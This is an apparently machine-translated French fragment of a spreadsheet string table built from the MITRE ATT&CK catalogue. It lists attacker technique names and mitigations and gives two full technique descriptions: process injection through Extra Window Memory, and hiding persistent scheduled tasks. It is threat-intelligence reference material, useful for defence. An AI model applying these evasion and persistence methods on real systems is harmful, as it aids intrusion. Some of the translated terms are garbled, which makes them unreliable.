    <t>Connexions directes aux VM Cloud</t>
  </si>
  <si>
    <t>Exécution du proxy binaire système</t>
  </si>
  <si>
    <t>Jumeau maléfique</t>
  </si>
  <si>
    <t>Chargement du code réfléchissant</t>
  </si>
  <si>
    <t>Découverte Wi-Fi</t>
  </si>
  <si>
    <t>Exclusion mutuelle</t>
  </si>
  <si>
    <t>Ignorer les interruptions de processus</t>
  </si>
  <si>
    <t>Évasion vers l’hôte</t>
  </si>
  <si>
    <t>Modification du raccourci</t>
  </si>
  <si>
    <t>Découverte de la fenêtre d’application</t>
  </si>
  <si>
    <t>Compte de messagerie</t>
  </si>
  <si>
    <t>Évasion basée sur le temps</t>
  </si>
  <si>
    <t>Détournement SSH</t>
  </si>
  <si>
    <t>Désactiver la journalisation des événements Windows</t>
  </si>
  <si>
    <t>Transfert programmé</t>
  </si>
  <si>
    <t>Partages SMB/Windows Admin</t>
  </si>
  <si>
    <t>Image interne de l’implant</t>
  </si>
  <si>
    <t>Tunneling de protocole</t>
  </si>
  <si>
    <t>Panneau de configuration</t>
  </si>
  <si>
    <t>Traversée de traduction d’adresses réseau</t>
  </si>
  <si>
    <t>Outil de téléchargement</t>
  </si>
  <si>
    <t>Fournisseur de support de sécurité</t>
  </si>
  <si>
    <t>Utiliser un autre matériel d’authentification</t>
  </si>
  <si>
    <t>Fournisseurs d’informations sur les menaces</t>
  </si>
  <si>
    <t>Exfiltration sur un autre support réseau</t>
  </si>
  <si>
    <t>Vidage de la configuration du périphérique réseau</t>
  </si>
  <si>
    <t>Recueillir des informations sur l’identité de la victime</t>
  </si>
  <si>
    <t>Désactiver ou modifier le pare-feu du système</t>
  </si>
  <si>
    <t>Archiver les données collectées</t>
  </si>
  <si>
    <t>Détournement de SIP et de fournisseurs de confiance</t>
  </si>
  <si>
    <t>Détournement de session de navigateur</t>
  </si>
  <si>
    <t>Services à distance</t>
  </si>
  <si>
    <t>Protocoles de messagerie</t>
  </si>
  <si>
    <t>Identité hybride</t>
  </si>
  <si>
    <t>Analyse des vulnérabilités</t>
  </si>
  <si>
    <t>Rechercher dans des bases de données techniques ouvertes</t>
  </si>
  <si>
    <t>Applications de l’électron</t>
  </si>
  <si>
    <t>Désactiver ou modifier le système d’audit Linux</t>
  </si>
  <si>
    <t>Contrôleur de domaine non autorisé</t>
  </si>
  <si>
    <t>Modification de la politique de signature de code</t>
  </si>
  <si>
    <t>Déployer le conteneur</t>
  </si>
  <si>
    <t>Modifier le registre</t>
  </si>
  <si>
    <t>Lancer Daemon</t>
  </si>
  <si>
    <t>Découverte de l’infrastructure cloud</t>
  </si>
  <si>
    <t>Informations d’identification des navigateurs Web</t>
  </si>
  <si>
    <t>Interception de chemin par détournement d’ordre de recherche</t>
  </si>
  <si>
    <t>Dégradation</t>
  </si>
  <si>
    <t>Régions cloud inutilisées/non prises en charge</t>
  </si>
  <si>
    <t>Usurpation DHCP</t>
  </si>
  <si>
    <t>Détournement de session de service à distance</t>
  </si>
  <si>
    <t>Remplissage binaire</t>
  </si>
  <si>
    <t>Modification de la stratégie de groupe</t>
  </si>
  <si>
    <t>Découverte des informations du navigateur</t>
  </si>
  <si>
    <t>Clés privées</t>
  </si>
  <si>
    <t>Serveur</t>
  </si>
  <si>
    <t>Gestion à distance Windows</t>
  </si>
  <si>
    <t>Exfiltration via Bluetooth</t>
  </si>
  <si>
    <t>Comptes par défaut</t>
  </si>
  <si>
    <t>Fournisseurs de temps</t>
  </si>
  <si>
    <t>Piège</t>
  </si>
  <si>
    <t>Détournement dynamique de Linker</t>
  </si>
  <si>
    <t>Communication par le biais de supports amovibles</t>
  </si>
  <si>
    <t>Effacer les journaux d’événements Windows</t>
  </si>
  <si>
    <t>Empoisonnement LLMNR/NBT-NS et relais SMB</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Mémoire LSASS</t>
  </si>
  <si>
    <t>Analyse active</t>
  </si>
  <si>
    <t>Mécanisme de contrôle de l’élévation des abus</t>
  </si>
  <si>
    <t>Créer un processus avec un jeton</t>
  </si>
  <si>
    <t>Setuid et Setgid</t>
  </si>
  <si>
    <t>Modèle objet de composant distribué</t>
  </si>
  <si>
    <t>Pulvérisation de mots de passe</t>
  </si>
  <si>
    <t>Proxy externe</t>
  </si>
  <si>
    <t>Capture du portail Web</t>
  </si>
  <si>
    <t>Adresses e-mail</t>
  </si>
  <si>
    <t>Voix de spearphishing</t>
  </si>
  <si>
    <t>Informations d’identification de domaine mises en cache</t>
  </si>
  <si>
    <t>Clés autorisées SSH</t>
  </si>
  <si>
    <t>Appliances de sécurité réseau</t>
  </si>
  <si>
    <t>Injection d’options d’exécution de fichier image</t>
  </si>
  <si>
    <t>Moteurs</t>
  </si>
  <si>
    <t>Relations d’affaires</t>
  </si>
  <si>
    <t>Accès cloud avec élévation de privilèges temporaire</t>
  </si>
  <si>
    <t>Capture vidéo</t>
  </si>
  <si>
    <t>Processus Doppelgänging</t>
  </si>
  <si>
    <t>Découverte de la configuration réseau du système</t>
  </si>
  <si>
    <t>Supprimer une instance Cloud</t>
  </si>
  <si>
    <t>Référentiels de code</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de fichiers du programme d’installation de l’exécutable</t>
  </si>
  <si>
    <t>Caractéristiques d’accessibilité</t>
  </si>
  <si>
    <t>Détournement de bande passante</t>
  </si>
  <si>
    <t>Découverte de compte</t>
  </si>
  <si>
    <t>Procuration</t>
  </si>
  <si>
    <t>Interpréteur de commandes et de scripts</t>
  </si>
  <si>
    <t>Blocage de l’indicateur</t>
  </si>
  <si>
    <t>Noms des employés</t>
  </si>
  <si>
    <t>Découverte de l’approbation de domaine</t>
  </si>
  <si>
    <t>Billet d’or</t>
  </si>
  <si>
    <t>Exfiltration automatisée</t>
  </si>
  <si>
    <t>Désactiver ou modifier le pare-feu cloud</t>
  </si>
  <si>
    <t>Remplacement de droite à gauche</t>
  </si>
  <si>
    <t>Micrologiciel des composants</t>
  </si>
  <si>
    <t>Retrait de l’indicateur</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non-C2 crypté symétrique</t>
  </si>
  <si>
    <t>Macros de modèles Office</t>
  </si>
  <si>
    <t>Confluent</t>
  </si>
  <si>
    <t>Passez le billet</t>
  </si>
  <si>
    <t>Commande d’administration de conteneur</t>
  </si>
  <si>
    <t>Découverte de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Résolution dynamique</t>
  </si>
  <si>
    <t>Tâche ou service de mascarade</t>
  </si>
  <si>
    <t>Appel de procédure asynchrone</t>
  </si>
  <si>
    <t>Duplication du trafic</t>
  </si>
  <si>
    <t>Modification du fichier Plist</t>
  </si>
  <si>
    <t>DLL AppCert</t>
  </si>
  <si>
    <t>Règle de transfert d’e-mail</t>
  </si>
  <si>
    <t>Données mises en scène</t>
  </si>
  <si>
    <t>Voler ou falsifier des certificats d’authentification</t>
  </si>
  <si>
    <t>Enregistrement de l’appareil</t>
  </si>
  <si>
    <t>Découverte des connexions réseau système</t>
  </si>
  <si>
    <t>Compromettre l’infrastructure</t>
  </si>
  <si>
    <t>Contournement de la marque du Web</t>
  </si>
  <si>
    <t>Désactiver le matériel cryptographique</t>
  </si>
  <si>
    <t>Pré-démarrage du système d’exploitation</t>
  </si>
  <si>
    <t>Construire une image sur l’hôte</t>
  </si>
  <si>
    <t>Injection exécutable portable</t>
  </si>
  <si>
    <t>Comptes compromis</t>
  </si>
  <si>
    <t>Lancement ctl</t>
  </si>
  <si>
    <t>CLI de périphérique réseau</t>
  </si>
  <si>
    <t>Histoire de la fête</t>
  </si>
  <si>
    <t>Attaque de rétrogradation</t>
  </si>
  <si>
    <t>Virtualisation/Évasion du bac à sable</t>
  </si>
  <si>
    <t>Service web</t>
  </si>
  <si>
    <t>Informations d’identification dans les fichiers</t>
  </si>
  <si>
    <t>Calcul DNS</t>
  </si>
  <si>
    <t>Éléments de connexion</t>
  </si>
  <si>
    <t>Capacités de la scène</t>
  </si>
  <si>
    <t>Cible du lien</t>
  </si>
  <si>
    <t>Canaux à plusieurs étages</t>
  </si>
  <si>
    <t>Vol financier</t>
  </si>
  <si>
    <t>Garde-fous d’exécution</t>
  </si>
  <si>
    <t>Découverte d’objets de stockage dans le cloud</t>
  </si>
  <si>
    <t>Énumération des journaux</t>
  </si>
  <si>
    <t>Usurpation d’identité/vol de jetons</t>
  </si>
  <si>
    <t>Exfiltration vers le dépôt de code</t>
  </si>
  <si>
    <t>Cognement de port</t>
  </si>
  <si>
    <t>Contrebande d’icônes LNK</t>
  </si>
  <si>
    <t>Voler le jeton d’accès à l’application</t>
  </si>
  <si>
    <t>Informations d’identification cloud supplémentaires</t>
  </si>
  <si>
    <t>Exécution par l’utilisateur</t>
  </si>
  <si>
    <t>Défiguration interne</t>
  </si>
  <si>
    <t>Utilisateurs masqués</t>
  </si>
  <si>
    <t>Créer et emprunter l’identité d’un jeton</t>
  </si>
  <si>
    <t>Préférences de stratégie de groupe</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non-C2 chiffré asymétrique</t>
  </si>
  <si>
    <t>Compte Cloud</t>
  </si>
  <si>
    <t>Découverte des processus</t>
  </si>
  <si>
    <t>Journalisation de l’historique des commandes Impair</t>
  </si>
  <si>
    <t>DLL du fournisseur de réseau</t>
  </si>
  <si>
    <t>Abonnement aux événements Windows Management Instrumentation</t>
  </si>
  <si>
    <t>CDN</t>
  </si>
  <si>
    <t>Vérifications basées sur l’activité de l’utilisateur</t>
  </si>
  <si>
    <t>Détournement de services cloud</t>
  </si>
  <si>
    <t>Outils de déploiement de logiciels</t>
  </si>
  <si>
    <t>Exfiltration sur le canal C2</t>
  </si>
  <si>
    <t>Usurpation de PID parent</t>
  </si>
  <si>
    <t>Recueillir des informations sur l’organisation des victimes</t>
  </si>
  <si>
    <t>Falsifier les informations d’identification Web</t>
  </si>
  <si>
    <t>Génération de demandes d’authentification multifacteur</t>
  </si>
  <si>
    <t>Binaire du logiciel hôte de compromis</t>
  </si>
  <si>
    <t>Modifier l’association de fichiers par défaut</t>
  </si>
  <si>
    <t>Détournement de VDSO</t>
  </si>
  <si>
    <t>Protocoles de transfert de fichiers</t>
  </si>
  <si>
    <t>Exploitation pour l’accès aux identifiants</t>
  </si>
  <si>
    <t>Émond</t>
  </si>
  <si>
    <t>Communication à sens unique</t>
  </si>
  <si>
    <t>Recueillir des informations sur le réseau des victimes</t>
  </si>
  <si>
    <t>Exploitation des services à distance</t>
  </si>
  <si>
    <t>Spearphishing interne</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de fichiers de services</t>
  </si>
  <si>
    <t>Clés d’exécution du registre/dossier de démarrage</t>
  </si>
  <si>
    <t>Relation de confiance</t>
  </si>
  <si>
    <t>Groupes locaux</t>
  </si>
  <si>
    <t>Recherche de sites Web/domaines ouverts</t>
  </si>
  <si>
    <t>Manipulation de compte</t>
  </si>
  <si>
    <t>Exfiltration par un protocole alternatif</t>
  </si>
  <si>
    <t>Modules et extensions du noyau</t>
  </si>
  <si>
    <t>Capture d’entrée de l’interface graphique</t>
  </si>
  <si>
    <t>Outil</t>
  </si>
  <si>
    <t>Exfiltration via USB</t>
  </si>
  <si>
    <t>Recherche de sources fermées</t>
  </si>
  <si>
    <t>Minuteries Systemd</t>
  </si>
  <si>
    <t>Hameçonnage</t>
  </si>
  <si>
    <t>Fichier HTML compilé</t>
  </si>
  <si>
    <t>Détournement de calcul</t>
  </si>
  <si>
    <t>Suppression de la connexion de partage réseau</t>
  </si>
  <si>
    <t>Proxy multi-sauts</t>
  </si>
  <si>
    <t>Formulaires Outlook</t>
  </si>
  <si>
    <t>Désactiver ou modifier les outils</t>
  </si>
  <si>
    <t>Manipulation des données</t>
  </si>
  <si>
    <t>Communication inter-processus</t>
  </si>
  <si>
    <t>Obscurcissement des données</t>
  </si>
  <si>
    <t>Données du Drive partagé sur le réseau</t>
  </si>
  <si>
    <t>Modifier l’image système</t>
  </si>
  <si>
    <t>Détourner le flux d’exécution</t>
  </si>
  <si>
    <t>Retrait de l’indicateur des outils</t>
  </si>
  <si>
    <t>Image malveillante</t>
  </si>
  <si>
    <t>Service de conteneurs</t>
  </si>
  <si>
    <t>Comptes valides</t>
  </si>
  <si>
    <t>Port non standard</t>
  </si>
  <si>
    <t>Évidage du processus</t>
  </si>
  <si>
    <t>Exploitation à des fins d’élévation de privilèges</t>
  </si>
  <si>
    <t>Recherche de ressources</t>
  </si>
  <si>
    <t>Suppression de l’accès au compte</t>
  </si>
  <si>
    <t>Bourrage d’identifiants</t>
  </si>
  <si>
    <t>Fichiers ou informations obscurcis</t>
  </si>
  <si>
    <t>Authentification multifacteur</t>
  </si>
  <si>
    <t>Collecte d’e-mails à distance</t>
  </si>
  <si>
    <t>Composants IIS</t>
  </si>
  <si>
    <t>Signature de code non valide</t>
  </si>
  <si>
    <t>Exécuter une instance virtuelle</t>
  </si>
  <si>
    <t>Code polymorphe</t>
  </si>
  <si>
    <t>Découverte de la politique de mot de passe</t>
  </si>
  <si>
    <t>Exécution déclenchée par un événement</t>
  </si>
  <si>
    <t>Authentification forcée</t>
  </si>
  <si>
    <t>Injection d’historique SID</t>
  </si>
  <si>
    <t>Franchissement des limites du réseau</t>
  </si>
  <si>
    <t>Données chiffrées pour l’impact</t>
  </si>
  <si>
    <t>Subvertir les contrôles de confiance</t>
  </si>
  <si>
    <t>Exécution élevée avec invite</t>
  </si>
  <si>
    <t>Microprogramme</t>
  </si>
  <si>
    <t>Canal crypté</t>
  </si>
  <si>
    <t>Package d’authentification</t>
  </si>
  <si>
    <t>Régsvr32</t>
  </si>
  <si>
    <t>Exfiltration vers des sites de stockage de texte</t>
  </si>
  <si>
    <t>Logiciel</t>
  </si>
  <si>
    <t>Capture d’entrée</t>
  </si>
  <si>
    <t>Médias sociaux</t>
  </si>
  <si>
    <t>Logiciel de gestion de la relation client</t>
  </si>
  <si>
    <t>Détournement de modèle objet composant</t>
  </si>
  <si>
    <t>Pouvoirs</t>
  </si>
  <si>
    <t>Compromettre la chaîne d’approvisionnement logicielle</t>
  </si>
  <si>
    <t>Renommer les utilitaires système</t>
  </si>
  <si>
    <t>Communication bidirectionnelle</t>
  </si>
  <si>
    <t>Exploitation pour l’exécution par le client</t>
  </si>
  <si>
    <t>Balayage de listes de mots</t>
  </si>
  <si>
    <t>Alertes de sécurité d’usurpation d’identité</t>
  </si>
  <si>
    <t>Page d’accueil Outlook</t>
  </si>
  <si>
    <t>Cryptographie asymétrique</t>
  </si>
  <si>
    <t>Exfiltration vers le stockage en nuage</t>
  </si>
  <si>
    <t>Transfert latéral de l’outil</t>
  </si>
  <si>
    <t>Interception de chemin par chemin non guillemé</t>
  </si>
  <si>
    <t>Installer le certificat numérique</t>
  </si>
  <si>
    <t>Éléments de démarrage</t>
  </si>
  <si>
    <t>Découverte du langage système</t>
  </si>
  <si>
    <t>Protocole de couche non-application</t>
  </si>
  <si>
    <t>Stéganographie</t>
  </si>
  <si>
    <t>Usurpation d’identité de protocole ou de service</t>
  </si>
  <si>
    <t>Registre des requêtes</t>
  </si>
  <si>
    <t>Limites de taille de transfert de données</t>
  </si>
  <si>
    <t>Comptes de domaine</t>
  </si>
  <si>
    <t>Installer le certificat racine</t>
  </si>
  <si>
    <t>Script d’ouverture de session réseau</t>
  </si>
  <si>
    <t>Déni de service du point de terminaison</t>
  </si>
  <si>
    <t>Compiler après la livraison</t>
  </si>
  <si>
    <t>Découverte de l’emplacement du système</t>
  </si>
  <si>
    <t>Piétinement VBA</t>
  </si>
  <si>
    <t>Emplois BITS</t>
  </si>
  <si>
    <t>Imitation</t>
  </si>
  <si>
    <t>Modifier les configurations de Cloud Compute</t>
  </si>
  <si>
    <t>Façade de domaine</t>
  </si>
  <si>
    <t>Empoisonnement du cache ARP</t>
  </si>
  <si>
    <t>Désactiver ou modifier les journaux cloud</t>
  </si>
  <si>
    <t>Découverte de logiciels de sécurité</t>
  </si>
  <si>
    <t>Fenêtre cachée</t>
  </si>
  <si>
    <t>ClicUne fois</t>
  </si>
  <si>
    <t>Déplacer les logiciels malveillants</t>
  </si>
  <si>
    <t>Identifier les rôles</t>
  </si>
  <si>
    <t>Encodage des données</t>
  </si>
  <si>
    <t>DLL AppInit</t>
  </si>
  <si>
    <t>Hameçonnage pour obtenir des informations</t>
  </si>
  <si>
    <t>Détournement de ressources</t>
  </si>
  <si>
    <t>Établir des comptes</t>
  </si>
  <si>
    <t>Obtenir des capacités</t>
  </si>
  <si>
    <t>Économiseur d’écran</t>
  </si>
  <si>
    <t>Politiques d’accès conditionnel</t>
  </si>
  <si>
    <t>Créer une instance Cloud</t>
  </si>
  <si>
    <t>Magasins de gestion des secrets dans le cloud</t>
  </si>
  <si>
    <t>Manipulation des données transmises</t>
  </si>
  <si>
    <t>/etc/passwd et /etc/shadow</t>
  </si>
  <si>
    <t>Agent de lancement</t>
  </si>
  <si>
    <t>Services système</t>
  </si>
  <si>
    <t>Shell de commande Windows</t>
  </si>
  <si>
    <t>Mémoire Proc</t>
  </si>
  <si>
    <t>Acquérir l’accès</t>
  </si>
  <si>
    <t>Corriger l’image du système</t>
  </si>
  <si>
    <t>Billet d’argent</t>
  </si>
  <si>
    <t>Données provenant de référentiels d’informations</t>
  </si>
  <si>
    <t>Persistance évidente</t>
  </si>
  <si>
    <t>Gestionnaire d’informations d’identification Windows</t>
  </si>
  <si>
    <t>Nom du compte Masquerade</t>
  </si>
  <si>
    <t>Ajouts matériels</t>
  </si>
  <si>
    <t>Composant logiciel serveur</t>
  </si>
  <si>
    <t>Destruction des données</t>
  </si>
  <si>
    <t>Encodage non standard</t>
  </si>
  <si>
    <t>Authentification du contrôleur de domaine</t>
  </si>
  <si>
    <t>Transfert de données vers un compte cloud</t>
  </si>
  <si>
    <t>Contrebande HTML</t>
  </si>
  <si>
    <t>Chiffrement réversible</t>
  </si>
  <si>
    <t>Obfuscation de commande</t>
  </si>
  <si>
    <t>Suppression de fichiers</t>
  </si>
  <si>
    <t>Compromis de conduite</t>
  </si>
  <si>
    <t>Déni de service réseau</t>
  </si>
  <si>
    <t>Commande d’administration du cloud</t>
  </si>
  <si>
    <t>Packages d’installation</t>
  </si>
  <si>
    <t>Analyse des blocs IP</t>
  </si>
  <si>
    <t>Injection de modèle</t>
  </si>
  <si>
    <t>Manipulation du jeton d’accès</t>
  </si>
  <si>
    <t>Interception de l’authentification multifacteur</t>
  </si>
  <si>
    <t>Emballage de logiciels</t>
  </si>
  <si>
    <t>Protocoles Web</t>
  </si>
  <si>
    <t>Visuel de base</t>
  </si>
  <si>
    <t>Système de fichiers caché</t>
  </si>
  <si>
    <t>Détournement de RDP</t>
  </si>
  <si>
    <t>Créer un compte</t>
  </si>
  <si>
    <t>Entrées XDG Autostart</t>
  </si>
  <si>
    <t>Découverte de services cloud</t>
  </si>
  <si>
    <t>Découverte du système à distance</t>
  </si>
  <si>
    <t>Découverte des services réseau</t>
  </si>
  <si>
    <t>Propriétés du domaine</t>
  </si>
  <si>
    <t>Découverte de logiciels</t>
  </si>
  <si>
    <t>Tableau de bord du service cloud</t>
  </si>
  <si>
    <t>Stockage local d’unité d’exécution</t>
  </si>
  <si>
    <t>Évasion du débogueur</t>
  </si>
  <si>
    <t>Espace après le nom de fichier</t>
  </si>
  <si>
    <t>Demandes rouvertes</t>
  </si>
  <si>
    <t>Empoisonnement SEO</t>
  </si>
  <si>
    <t>Passez le hachage</t>
  </si>
  <si>
    <t>Exfiltration sur support physique</t>
  </si>
  <si>
    <t>Chargement latéral DLL</t>
  </si>
  <si>
    <t>Transfert d’outil d’entrée</t>
  </si>
  <si>
    <t>Autorisations supplémentaires de délégué d’e-mail</t>
  </si>
  <si>
    <t>Exécution sans serveur</t>
  </si>
  <si>
    <t>Appels système Ptrace</t>
  </si>
  <si>
    <t>Paramètres d’alimentation</t>
  </si>
  <si>
    <t>Résolution dynamique de l’API</t>
  </si>
  <si>
    <t>Protocole de bureau à distance</t>
  </si>
  <si>
    <t>Script d’ouverture de session (Windows)</t>
  </si>
  <si>
    <t>ListePlantation</t>
  </si>
  <si>
    <t>Masquer l’infrastructure</t>
  </si>
  <si>
    <t>Modification de la politique du domaine ou du locataire</t>
  </si>
  <si>
    <t>Traitement des scripts XSL</t>
  </si>
  <si>
    <t>Analyser les bases de données</t>
  </si>
  <si>
    <t>Fichiers et répertoires cachés</t>
  </si>
  <si>
    <t>Créer un instantané</t>
  </si>
  <si>
    <t>Déterminer les emplacements physiques</t>
  </si>
  <si>
    <t>Test de bureau</t>
  </si>
  <si>
    <t>Développer les capacités</t>
  </si>
  <si>
    <t>SNMP (vidage MIB)</t>
  </si>
  <si>
    <t>Lien malveillant</t>
  </si>
  <si>
    <t>Jeton d’accès à l’application</t>
  </si>
  <si>
    <t>Pilote LSASS</t>
  </si>
  <si>
    <t>Exécution du service</t>
  </si>
  <si>
    <t>Verrouillage environnemental</t>
  </si>
  <si>
    <t>Canaux de secours</t>
  </si>
  <si>
    <t>Attributs de fichier NTFS</t>
  </si>
  <si>
    <t>Découverte de l’heure système</t>
  </si>
  <si>
    <t>À</t>
  </si>
  <si>
    <t>Injection de bibliothèque de liens dynamiques</t>
  </si>
  <si>
    <t>Modifier le processus d’authentification</t>
  </si>
  <si>
    <t>Règles Udev</t>
  </si>
  <si>
    <t>Accrochage de l’API d’identification</t>
  </si>
  <si>
    <t>Corruption du micrologiciel</t>
  </si>
  <si>
    <t>Inhiber la récupération du système</t>
  </si>
  <si>
    <t>DLL d’aide Netsh</t>
  </si>
  <si>
    <t>Proxy interne</t>
  </si>
  <si>
    <t>Exécution du proxy de script système</t>
  </si>
  <si>
    <t>Résolveur Dead Drop</t>
  </si>
  <si>
    <t>Données indésirables</t>
  </si>
  <si>
    <t>API de conteneur</t>
  </si>
  <si>
    <t>Procédures stockées SQL</t>
  </si>
  <si>
    <t>Authentification des périphériques réseau</t>
  </si>
  <si>
    <t>Effacement du contenu du disque</t>
  </si>
  <si>
    <t>Applications de messagerie</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non C2 non chiffré</t>
  </si>
  <si>
    <t>Détournement de Dylib</t>
  </si>
  <si>
    <t>Rétrograder l’image système</t>
  </si>
  <si>
    <t>Comptes locaux</t>
  </si>
  <si>
    <t>L’exploitation à des fins d’évasion de défense</t>
  </si>
  <si>
    <t>Exécution du proxy Trusted Developer Utilities</t>
  </si>
  <si>
    <t>Arrêt/redémarrage du système</t>
  </si>
  <si>
    <t>Usurpation d’argument de processus</t>
  </si>
  <si>
    <t>Filtres de socket</t>
  </si>
  <si>
    <t>Prévention des intrusions sur le réseau</t>
  </si>
  <si>
    <t>Limiter l’accès aux ressources sur le réseau</t>
  </si>
  <si>
    <t>Stockage de données à distance</t>
  </si>
  <si>
    <t>Filtrer le trafic réseau</t>
  </si>
  <si>
    <t>Restreindre le contenu Web</t>
  </si>
  <si>
    <t>Limiter l’installation de logiciels</t>
  </si>
  <si>
    <t>Conseils pour les développeurs d’applications</t>
  </si>
  <si>
    <t>Limiter l’installation matérielle</t>
  </si>
  <si>
    <t>Formation des utilisateurs</t>
  </si>
  <si>
    <t>Contrôle de compte d’utilisateur</t>
  </si>
  <si>
    <t>Configuration du système d’exploitation</t>
  </si>
  <si>
    <t>Sauvegarde des données</t>
  </si>
  <si>
    <t>Prévention de l’exécution</t>
  </si>
  <si>
    <t>Protection d’accès aux informations d’identification</t>
  </si>
  <si>
    <t>Autorisations des variables d’environnement</t>
  </si>
  <si>
    <t>Prévention des pertes de données</t>
  </si>
  <si>
    <t>Intégrité privilégiée des processus</t>
  </si>
  <si>
    <t>Ne pas atténuer</t>
  </si>
  <si>
    <t>Pré-compromis</t>
  </si>
  <si>
    <t>Intégrité du démarrage</t>
  </si>
  <si>
    <t>Canal de communication hors bande</t>
  </si>
  <si>
    <t>Segmentation du réseau</t>
  </si>
  <si>
    <t>Programme de renseignements sur les menaces</t>
  </si>
  <si>
    <t>Politiques de mot de passe</t>
  </si>
  <si>
    <t>Prévention du comportement sur Endpoint</t>
  </si>
  <si>
    <t>Gestion des comptes d’utilisateur</t>
  </si>
  <si>
    <t>Restreindre les autorisations de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Gestion des comptes privilégiés</t>
  </si>
  <si>
    <t>Restreindre les autorisations du registre</t>
  </si>
  <si>
    <t>Authentification multifactorielle</t>
  </si>
  <si>
    <t>Configuration logicielle</t>
  </si>
  <si>
    <t>Isolation des applications et sandboxing</t>
  </si>
  <si>
    <t>Protection contre les exploits</t>
  </si>
  <si>
    <t>Configuration d’Active Directory</t>
  </si>
  <si>
    <t>Mettre à jour le logiciel</t>
  </si>
  <si>
    <t>Limiter le chargement de la bibliothèque</t>
  </si>
  <si>
    <t>Désactiver ou supprimer une fonctionnalité ou un programme</t>
  </si>
  <si>
    <t>Politiques d’utilisation du compte</t>
  </si>
  <si>
    <t>Chiffrer les informations sensibles</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans le processus via Extra Window Memory (EWM) afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection EWM est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Avant de créer une fenêtre, les processus graphiques basés sur Windows doivent prescrire ou enregistrer une classe windows, qui stipule l’apparence et le comportement (via les procédures windows, qui sont des fonctions qui gèrent l’entrée/sortie de données). (Citation : Classes de fenêtre Microsoft) L’inscription de nouvelles classes Windows peut inclure une demande d’ajout d’un maximum de 40 octets d’EWM à la mémoire allouée de chaque instance de cette classe. Cet EWM est destiné à stocker des données spécifiques à cette fenêtre et dispose de fonctions d’interface de programmation d’application (API) spécifiques pour définir et obtenir sa valeur. (Citation : Fonction Microsoft GetWindowLong) (Citation : Fonction Microsoft SetWindowLong)
Bien que petit, l’EWM est suffisamment grand pour stocker un pointeur 32 bits et est souvent utilisé pour pointer vers une procédure Windows. Les logiciels malveillants peuvent éventuellement utiliser cet emplacement mémoire dans le cadre d’une chaîne d’attaque qui comprend l’écriture de code dans des sections partagées de la mémoire du processus, la mise en place d’un pointeur vers le code dans EWM, puis l’appel de l’exécution en renvoyant le contrôle d’exécution à l’adresse dans l’EWM du processus.
L’exécution accordée par l’injection EWM peut permettre l’accès à la mémoire du processus cible et éventuellement à des privilèges élevés. L’écriture de charges utiles dans des sections partagées évite également l’utilisation d’appels d’API hautement surveillés tels que &lt;code&gt;WriteProcessMemory&lt;/code&gt; et &lt;code&gt;CreateRemoteThread&lt;/code&gt;. (Citation : Injection de processus élastique juillet 2017) Des échantillons de logiciels malveillants plus sophistiqués peuvent également contourner les mécanismes de protection tels que la prévention de l’exécution des données (DEP) en déclenchant une combinaison de procédures Windows et d’autres fonctions système qui réécriront la charge utile malveillante à l’intérieur d’une partie exécutable du processus cible.  (Citation : MalwareTech Power Loader août 2013) (Citation : WeLiveSecurity Gapz et Redyms mars 2013)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection EWM peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du planificateur de tâches Windows pour effectuer la planification de tâches pour l’exécution initiale ou récurrente de code malveillant. Il existe plusieurs façons d’accéder au planificateur de tâches dans Windows. L’utilitaire [schtasks](https://attack.mitre.org/software/S0111) peut être exécuté directement sur la ligne de commande, ou le planificateur de tâches peut être ouvert via l’interface graphique dans la section Outils d’administration du Panneau de configuration. (Citation : débordement de pile) Dans certains cas, les adversaires ont utilisé un wrapper .NET pour le planificateur de tâches Windows, tandis que les adversaires ont utilisé la bibliothèque Windows netapi32 et [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) pour créer une tâche planifiée. Les adversaires peuvent également utiliser l’applet de commande Powershell « Invoke-CimMethod », qui exploite la classe WMI « PS_ScheduledTask pour créer une tâche planifiée via un chemin d’accès XML. (Citation : Red Canary - Atomic Red Team)
Un adversaire peut utiliser le Planificateur de tâches Windows pour exécuter des programmes au démarrage du système ou de manière planifiée à des fins de persistance. Le planificateur de tâches Windows peut également être utilisé de manière abusive pour effectuer une exécution à distance dans le cadre d’un mouvement latéral et/ou pour exécuter un processus dans le contexte d’un compte spécifié (tel que SYSTEM). À l’instar de [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), les adversaires ont également abusé du planificateur de tâches Windows pour masquer potentiellement l’exécution unique dans le cadre de processus système signés/approuvés. (Citation : ProofPoint Serpent)
Les adversaires peuvent également créer des tâches planifiées « cachées » (c’est-à-dire [Masquer les artefacts](https://attack.mitre.org/techniques/T1564)) qui peuvent ne pas être visibles par les outils de défense et les requêtes manuelles utilisées pour énumérer les tâches. Plus précisément, un adversaire peut masquer une tâche à l’adresse « schtasks /query » et au planificateur de tâches en supprimant la valeur de registre du descripteur de sécurité (SD) associée (lorsque la suppression de cette valeur doit être effectuée à l’aide des autorisations SYSTEM). (Citation : SigmaHQ)(Citation : Tâche planifiée de Tarrask) Les adversaires peuvent également utiliser d’autres méthodes pour masquer des tâches, telles que la modification des métadonnées (par exemple, la valeur « Index ») dans les clés de registre associées. (Citation : Défense contre les attaques de tâches planifiées dans les environnements Windows)
https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
